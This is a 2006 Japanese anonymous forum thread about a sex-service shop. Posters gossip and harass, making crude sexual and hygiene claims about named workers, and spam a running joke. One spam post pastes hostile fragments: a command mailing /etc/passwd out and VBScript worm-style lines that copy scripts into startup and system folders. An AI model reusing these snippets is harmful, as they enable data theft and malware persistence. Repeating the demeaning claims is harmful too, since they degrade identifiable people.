プリンス&プリンセスについて語るスレ☆☆☆Part10
最初から mode
■板へ戻る
▼下へ 最新
次頁
01 ) 本家本元プリプリ通信!!
[2006/10/12(木) 20:19]
[リンク先]
[リンク先]
《禁止事項》
☆特定の個人に対する誹謗中傷
・特に実名・住所・電話番号などを晒すなど
・プライバシーの侵害は絶対に禁止
☆本番行為を助長するレス
☆叩き・荒らしは完全スルーで!!

02 ) ↑
[2006/10/12(木) 20:39]
田 附 裕 樹と大文字焼き

03 ) ↑
[2006/10/12(木) 20:39]
ウトロ田 附と大文字焼き

04 ) ↑
[2006/10/12(木) 21:01]
大文字焼きといったら大文字焼き

05 ) ↑
[2006/10/12(木) 22:31]
田 附 裕 樹キモい!

06 ) ☆
[2006/10/12(木) 22:39]
○ーナってどう?
顔はかわいいしボインだし

07 ) ++NG++一 一
[2006/10/13(金) 00:30]
メルマガに月のことがファンキーガールって書いてあってんけど、ひょっとして店員が臭いとか書いてる犯人ちゃうかなと推理できるんですが、みなさん如何思われますか?

08 ) ↑↑
[2006/10/13(金) 00:37]
不利益になるような事書かんやろ?妄想がキツイな

09 ) ↑
[2006/10/13(金) 01:45]
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(
<省略> [全文]

10 ) 月
[2006/10/13(金) 02:12]
いやいや、ワシは正真正銘の客やけどな、月のオメコはホンマに臭いねんて(>д<)
シックスナインしたら、よぅ〜わかるで。
ワシの前に入った客が中出ししとるんちゃうかな?
月はいつ行ってもクサメコやで(>_<)
カワイイから仕方なく言ってるんやけどな。

11 ) ↑
[2006/10/13(金) 04:25]
ここの店長!最悪みたいやな!昼入ったけど女が愚痴まくりやった(-_-メ)女から信用されてないらしい…辞めろよ店長!女からの伝言じゃ

12 ) ↑
[2006/10/13(金) 04:58]
ファンキーガールと大文字焼き

13 ) ↑
[2006/10/13(金) 04:59]
不利益と大文字焼き

14 ) ↑
[2006/10/13(金) 05:00]
何やこの英語は大文字焼き

15 ) ↑
[2006/10/13(金) 05:01]
中出しと大文字焼き

16 ) ↑
[2006/10/13(金) 05:16]
10さん。月は中出しもしてますが、あれは性病の匂いです。ただの体臭
ではありません。膣の内側を指やチンポで擦るから、さらに匂いが放出
されて悪臭が部屋を充満するのです。それが、異臭騒ぎと大文字焼き
になるのです。前に誰かが言ってましたが、シャワーしても、帰って
ハンドソープで洗っても臭い匂いが取れずに困ったと。そうなると
どんだけ臭いね大文字焼きになります。そうなると、ここのアホ店員と <省略> [全文]

17 ) ↑
[2006/10/13(金) 05:18]
すっぱい月と大文字焼き

18 ) ↑
[2006/10/13(金) 05:24]
13日の月のメルマガようあんな真逆の事が書けるね。アホ店員は、
頭だけと違て目も鼻も全て悪いな。

19 ) ↑
[2006/10/13(金) 05:25]
最近、弁慶止めよったな。正解やわ。

20 ) ↑
[2006/10/13(金) 05:27]
ついでに、メルマガも止めたらええねん。ほんまに嘘ばっかりやし。

21 ) ↑
[2006/10/13(金) 05:29]
ついでに、アホ店員も辞めたらええねん。ほんまにアホばっかりやし。

22 ) ↑
[2006/10/13(金) 05:30]
ついでに、店も止めたらええねん。ほんまに臭いのばっかりやし。

23 ) ↑
[2006/10/13(金) 05:31]
ついでに、田ヅケもやめたらええねん。ほんまに過保護やし。

24 ) ↑
[2006/10/13(金) 05:33]
23>店止めたら田ヅケも自動的に辞めなあかんやん。

25 ) ↑
[2006/10/13(金) 07:05]
ベンケイとは誰のこと?

26 ) オイオイ
[2006/10/13(金) 08:32]
まだ大文字焼を書いてるん?いい加減飽きるわ、オツム悪すぎやな。それとあまり人の事アホとか書くなバータレ!
都の闘拳じゃ!シャーオラー!

27 ) ↑
[2006/10/13(金) 08:57]
お主は亀田か!

28 ) ☆
[2006/10/13(金) 09:47]
前おったペコちゃんは今どこにおるんやろう…

29 ) ↑
[2006/10/13(金) 09:48]
++NG++

30 ) ↑
[2006/10/13(金) 10:47]
アホか?こいつ頭打ったんか?

31 ) ペコ
[2006/10/13(金) 11:05]
多分、花びら3回転ぐらいにいるんじゃないの? 今までで一番被害が大きな地雷やった

32 ) ☆
[2006/10/13(金) 13:34]
ペコちゃんは地雷ですか…残念ながらそう思われても仕方ない女の子でしたね(>_<)

33 ) ↑
[2006/10/13(金) 14:39]
最近、力さん出てこないな。あーゆーシト好きなんだがw

34 ) ↑
[2006/10/13(金) 15:05]
紀香キツイ

35 ) ↑
[2006/10/13(金) 15:37]
なぁ、力さんよぉ
  /〃〃 〃 \
  /〃ノ(((((( )))
 / λ  \〃/)
`| / □ (・) (・)|
 (6$    ´づ)
 | ⊂□⊃ __ |
 |    //  /ノ
/|     ̄ ̄/\

36 ) うわ↑
[2006/10/13(金) 15:43]
ちゃんとオーニタに見えるわ

37 ) 力
[2006/10/13(金) 16:30]
マジレスでスマソ。最近の書き込みをみてるとなんか書き込みをする気にならないんだよな。
ウンでもアレだぞ、俺みたいな俗ラーのカキコを読んでくれてるファンが居るって事が、ウン。感動だな、ウン。でもアレだぞ、このスレをど真ん中に戻そうと思うと、ウンでもアレだ皆の協力が必要だな、ウン。……時間掛んね。

38 ) ども
[2006/10/13(金) 18:14]
力さん、確かに最近のプリプリスレはイッてますね…。
そのせいか力さんのレスにもキレがないですね(苦笑)。

39 ) このスレの住人
[2006/10/13(金) 18:23]
バカみた〜い!ヒマさえあれば大文字焼きしか言わないしさぁ!もうちょっとマトモなこと言えばいいのに!

40 ) ↑
[2006/10/13(金) 18:29]
>>39
うむ、痛いヤツが数人おりますなw

41 ) サナが
[2006/10/13(金) 19:36]
名前変えて復帰してるワラ

42 ) ↑
[2006/10/13(金) 20:38]
そんな嬢、居た?

43 ) ↑
[2006/10/14(土) 01:32]
キャンキャンでサナ
プリプリではクミだった

44 ) ↑
[2006/10/14(土) 02:08]
ヒマさえあれば大文字焼きしか言わないしさぁ!と大文字焼き

45 ) ↑
[2006/10/14(土) 02:40]
痛いヤツが数人おりますなwと大文字焼き

46 ) 荒らしはスルー
[2006/10/14(土) 06:00]
姫ちゃんの新しい画像いいね。
ちひろちゃんの画像もアップ希望。

47 ) ↑
[2006/10/14(土) 07:25]
ちひろちゃんmo大文字焼き

48 ) ↑
[2006/10/14(土) 09:15]
大文字焼きがアラシと決めつけられて悲しいと大文字焼き

49 ) ヒメ?
[2006/10/14(土) 09:16]
あの顔のどこがええんかわからん。ハッキリ言ってブスやんか。あんなんにてんてこまいしてるようじやぁあかん。

50 ) ↑
[2006/10/14(土) 11:21]
姫の良さは会った奴しかわからないと大文字焼き

■板へ戻る
 ▲上へ 最新
次頁

管理者:KFJ
KoMaDo-1.5a